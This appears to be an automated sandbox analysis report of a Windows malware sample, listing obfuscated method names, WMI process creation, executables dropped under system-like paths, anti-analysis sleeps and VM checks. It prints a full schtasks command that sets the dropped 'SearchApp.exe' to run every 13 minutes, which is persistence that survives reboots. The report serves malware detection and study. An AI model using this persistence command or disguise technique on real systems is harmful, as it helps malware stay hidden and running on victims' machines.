            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, lj1laTzGDxu613i1FI.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'bM3ZJQQTVw43IjuCbtL', 'vcsZPjQlsPxDpE4wWBc', 'UnM8xlQMDIEiVAwEq5D', 'nCrXWCQQhsuGUOgCgUr', 'zOYNIuQadpEvmw8xeWm', 'V7y0baQF91a8cVnZiTH'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, KDktn6iWXVSFMxslT5o.csHigh entropy of concatenated method names: 's7mvFGPkN8', 'L65vUr4Xqb', 'mZrv1x4mvx', 'lgvvYDtlwh', 'xK3vOhZWVx', 'JChvDioi6R', 'dGVv7UM4H8', 'DvLvLcXIh5', 'cWLvfNf8Dv', 'pZyvZNE6o3'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, lY6Co0F9EwkNTDs7jO.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'onq8U5M5cRBX0df75RG', 'WJGJknMJtV6oIus04Ag', 'i3FJwtMVXHetqVtjCds', 'FalhKgMgJjAA71Y0NaV', 'mfIYkDMkhGVim9VXeSW', 'YacK1iMHeDqTqpTXKWS'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.csHigh entropy of concatenated method names: 'iryag2jtV5GabvjdoCK', 'XAV83fjdIOLkn9FNa3X', 'Ip6hkCjewXQSgniY08f', 'iitCanjyD2NkvPsVrbk', 'Nb6QvJFACJ', 'drcN0RjqwIqiIdL6MgI', 'aixyMdj9Af4vgTJy9G3', 'bj0S9GjAKZIfCMOsq2f', 'OpYPASjNCbTvQnXLyKO', 'yEZbUWjpoBng1FUZmJJ'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, KU2FtYQFDMdkRnKiqt.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'cqE7KKKeJ', 'wgdRBJrIrRHJa7U3GXI', 'lTHPcDr3AHBKyqdYPEx', 'aBgkgRrDRSf6XRWrL1t', 'BSAWYTrxRJexBmqaNww', 'OaIdNlrBo6A5CroqSwp'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, FGj9YGiwAmn2M0yQIdU.csHigh entropy of concatenated method names: 'qSeaSNU3b0', 'ln6aUI6961', 'Xcma1qtJM0', 'fKcaY0CPM6', 'OfIaOrQhQt', 'IZWPbwdI9BvQq3Di0eC', 'aGTTw4dGTrskNJlwDrb', 'bRivXydnitIio8WcG0l', 'chZXjGd3gTRtqQAZBLe', 'DpZQx9dD0kUvuJ47rZl'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, G0g1AIMSBjshn8DajmW.csHigh entropy of concatenated method names: 'xutZPPLl6iX6dvYcx8W', 'PQLPh1LMRd6Zb1PWmUg', 'DUSHsFLrcyg0xJxT6yv', 'OOfIGqLTDeXIWQBxhUD', 'eUDwUuvO0x', 'WM4', '_499', 'E2iw1IP050', 'ywawYpjUOI', 'JuCwO7tKIZ'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, w7Jk5Zee6v5air8K1QP.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'W0AAtkQIRBNrTIjbLKc', 'AOXrsGQ3e2jgjsPa9TV', 'FCa5EXQDiSGmPunwMjH', 'TptmuAQxf7ThmNFvMac', 'qlFrf4QBwGMbi1FUyog', 'KtXFyJQu4lS2RcIPjVf'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, jq2KiSnrjU9jHvH4sl.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'FXnuLGMQJ8yZJHD6179', 'DUhgWIMaZApXlYTudxq', 'loD8t7MFg3tinMqQrT9', 'cFGAV9M0Uqtt5ms8k7R', 'y96N9vMUJD5L2qTGHrV', 'OgEM21M1n11maTf2S8Z'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, lFI6QRM3bSQ7bMRLkfE.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'dUcNCoOYuI', 'uT8NJkNGfY', 'lICNTr21TS', 'EC9', '_74a', '_8pl', '_27D', '_524'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeFile created: C:\winSaves\fontsavesbroker.exeJump to dropped file
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\Windows\Cursors\SearchApp.exeJump to dropped file
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeJump to dropped file
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\Windows\Cursors\SearchApp.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeMemory allocated: 1AD90000 memory reserve | memory write watchJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeMemory allocated: 1AE80000 memory reserve | memory write watchJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeMemory allocated: 1AFF0000 memory reserve | memory write watchJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeMemory allocated: DB0000 memory reserve | memory write watch
            Source: C:\winSaves\fontsavesbroker.exeMemory allocated: 1AA50000 memory reserve | memory write watch
            Source: C:\winSaves\fontsavesbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeWindow / User API: threadDelayed 1182Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exeWindow / User API: threadDelayed 981Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeWindow / User API: threadDelayed 368Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exeWindow / User API: threadDelayed 891
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23010
            Source: C:\winSaves\fontsavesbroker.exe TID: 2680Thread sleep count: 1182 > 30Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exe TID: 2680Thread sleep count: 981 > 30Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exe TID: 2668Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 7156Thread sleep count: 368 > 30Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 5316Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 3992Thread sleep count: 336 > 30Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 3992Thread sleep count: 82 > 30Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 2816Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\winSaves\fontsavesbroker.exe TID: 2496Thread sleep count: 891 > 30
            Source: C:\winSaves\fontsavesbroker.exe TID: 2016Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\winSaves\fontsavesbroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004DA5F4
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_004EB8E0
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EDD72 VirtualQuery,GetSystemInfo,0_2_004EDD72
            Source: C:\winSaves\fontsavesbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\winSaves\fontsavesbroker.exeThread delayed: delay time: 922337203685477
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\userJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: j0GOUGjcJD.exe, 00000000.00000003.1678795891.00000000033F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: fontsavesbroker.exe.0.drBinary or memory string: HVMCIkvIdr
            Source: fontsavesbroker.exe, 00000004.00000002.1803962500.000000001BBC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
